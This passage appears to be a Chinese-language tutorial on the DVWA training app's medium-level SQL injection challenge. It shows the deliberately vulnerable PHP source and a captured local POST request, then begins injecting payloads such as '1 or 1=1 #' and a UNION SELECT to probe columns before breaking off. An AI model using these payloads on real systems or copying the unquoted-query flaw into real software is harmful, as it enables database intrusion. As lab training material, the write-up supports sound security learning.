文章目录
medium.php
SQL Injection Source
vulnerabilities/sqli/source/medium.php
<?php
if( isset( $_POST[ 'Submit' ] ) ) {
// Get input
$id = $_POST[ 'id' ];
$id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);
$query = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' );
// Get results
while( $row = mysqli_fetch_assoc( $result ) ) {
// Display values
$first = $row["first_name"];
$last = $row["last_name"];
// Feedback for end user
echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
}
}
// This is used later on in the index.php page
// Setting it here so we can close the database connection in here like in the rest of the source scripts
$query = "SELECT COUNT(*) FROM users;";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
$number_of_rows = mysqli_fetch_row( $result )[0];
mysqli_close($GLOBALS["___mysqli_ston"]);
?>
1.medium相对low级别的变化
1)代码中medium相对low级别的变化
$id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);
详见:
PHP mysqli_real_escape_string() 函数
2)前端页面中medium相对low级别的变化
页面设置下拉选择表单,对用户的输入作了限制。
2.漏洞利用
可以通过抓包改参数,提交恶意构造的查询参数。
POST http://127.0.0.1/dvwa/vulnerabilities/sqli/ HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://127.0.0.1/dvwa/vulnerabilities/sqli/
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Content-Length: 18
DNT: 1
Host: 127.0.0.1
Pragma: no-cache
Cookie: security=medium; PHPSESSID=5c77n9pgnrr9u9i6383rko2oh6
id=1&Submit=Submit
1)判断注入类型
抓包更改参数id为1′ or 1=1 #
抓包更改参数id为1 or 1=1 #
存在数字型注入。
因为数字型注入不需要借助引号,所以mysql_real_escape_string函数的设置对注入对我们要进行的注入操作无限制。
2)猜解字段
得出结论:
字段数2个,即First name、Surname
3)确定显示的字段顺序
更改参数id为1 union select 1,2 #
sql查询语句:select First name,Surname from 表 where ID=id…